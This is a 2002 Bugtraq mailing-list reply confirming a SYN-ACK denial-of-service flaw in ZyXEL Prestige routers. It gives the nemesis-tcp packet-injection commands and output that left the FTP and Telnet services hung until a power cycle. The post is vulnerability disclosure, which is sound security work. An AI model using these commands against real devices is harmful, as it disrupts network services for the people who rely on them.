Bugtraq mailing list archives
RE: ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS
From: "Christopher Gripp" <cgripp () axcelerant com>
Date: Mon, 24 Jun 2002 10:11:15 -0700
I have verified this same DoS attack is viable on a Prestige 310 running an OEM version of code written specifically for my company. I successfully DoS'd both the FTP and Telnet services. Below are the nemesis commands used. The services remained in an unreachable state until a powercycle was performed. [root@mybox root]# nemesis-tcp -v -fS -fA -S [SRC IP] -D [DST IP] -y 23 TCP Packet Injection -=- The NEMESIS Project 1.32 Copyright (C) 1999, 2000, 2001 Mark Grimes <obecian () packetninja net> Portions copyright (C) 2001 Jeff Nathan <jeff () wwti com> [IP] [SRC IP] > [DST IP] [Ports] 42069 > 23 [Flags] SYN ACK [TCP Urgent Pointer] 2048 [Window Size] 512 [ACK number] 420 [Sequence number] 420 [IP ID] 0 [IP TTL] 254 [IP TOS] 0x18 [IP Frag] 0x4000 [IP Options] Wrote 40 bytes TCP Packet Injected [root@mybox root]# nemesis-tcp -v -fS -fA -S [SRC IP] -D [DST IP] -y 21 TCP Packet Injection -=- The NEMESIS Project 1.32 Copyright (C) 1999, 2000, 2001 Mark Grimes <obecian () packetninja net> Portions copyright (C) 2001 Jeff Nathan <jeff () wwti com> [IP] [SRC IP] > [DST IP] [Ports] 42069 > 21 [Flags] SYN ACK [TCP Urgent Pointer] 2048 [Window Size] 512 [ACK number] 420 [Sequence number] 420 [IP ID] 0 [IP TTL] 254 [IP TOS] 0x18 [IP Frag] 0x4000 [IP Options] Wrote 40 bytes TCP Packet Injected Christopher Gripp Systems Engineer Axcelerant
Current thread:
- ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS Kistler Ueli (Jun 17)
- Re: ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS Knud Erik Højgaard (Jun 17)
- Re: ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS Rich Henning (Jun 17)
- Message not available
- Re: ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS -- 643R testing Kistler Ueli (Jun 17)
- Message not available
- <Possible follow-ups>
- RE: ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS Christopher Gripp (Jun 25)